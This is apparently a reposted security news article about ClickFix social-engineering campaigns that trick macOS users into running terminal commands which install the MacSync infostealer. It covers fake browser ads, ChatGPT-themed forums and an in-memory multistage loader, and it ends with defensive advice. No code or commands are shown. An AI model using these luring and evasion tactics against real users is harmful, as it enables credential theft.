By rssfeeds-admin 
The latest observed trend involves MacSync, an infostealer malware, delivered through this method.
Over the past three months, several campaigns leveraging ClickFix have been observed, showing how attackers continuously evolve their tactics to bypass security and harvest sensitive information.
The ClickFix campaign targeting macOS users follows a pattern of luring victims to malicious websites, disguised as legitimate sources.
One of the most notable campaigns began in November 2025, where attackers used Google-sponsored links to advertise a fake OpenAI Atlas browser download, misleading users into thinking they were interacting with a trusted platform.
This bait led to a phishing site that prompted users to run malicious commands in the terminal, a typical ClickFix method. These commands triggered the installation of the MacSync infostealer, which executed with the victim’s permission.
From Lures To Dynamic Payloads
In December 2025, the attackers adjusted their tactics. Instead of redirecting users to a direct download page, they used ChatGPT-themed fake forums to present themselves as helpful guides, tricking users into downloading a malicious script from a GitHub-themed page.
This clever tactic made the attack appear more legitimate and bypassed macOS security tools like Gatekeeper and XProtect, which typically block suspicious downloads.
By February 2026, the MacSync infostealer had evolved further. The latest campaign involved a multistage loader system in which the malware first used a shell script to fetch and execute additional payloads in memory.
This version was capable of in-memory execution, meaning the malware could run without leaving traces on the file system, making it harder to detect, as reported by Sophos.
The evolution of ClickFix campaigns highlights a concerning trend: attackers are increasingly targeting macOS with sophisticated, multistage malware campaigns.
The shift from direct downloads to dynamic payload execution reflects a deep understanding of the operating system’s security features.
The MacSync infostealer, combined with ClickFix tactics, represents a growing risk for macOS users, especially as the malware increasingly uses legitimate tools and platforms to evade detection.
Users are urged to be cautious when interacting with unfamiliar websites, avoid copying commands from unknown sources, and regularly update their sophos security software.
Security teams must adapt to this evolving threat landscape by focusing on behavioral detection and enhancing endpoint security monitoring to protect against these sophisticated social engineering attacks.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.
The post ClickFix Social Engineering Delivers MacSync Infostealer On Macs appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.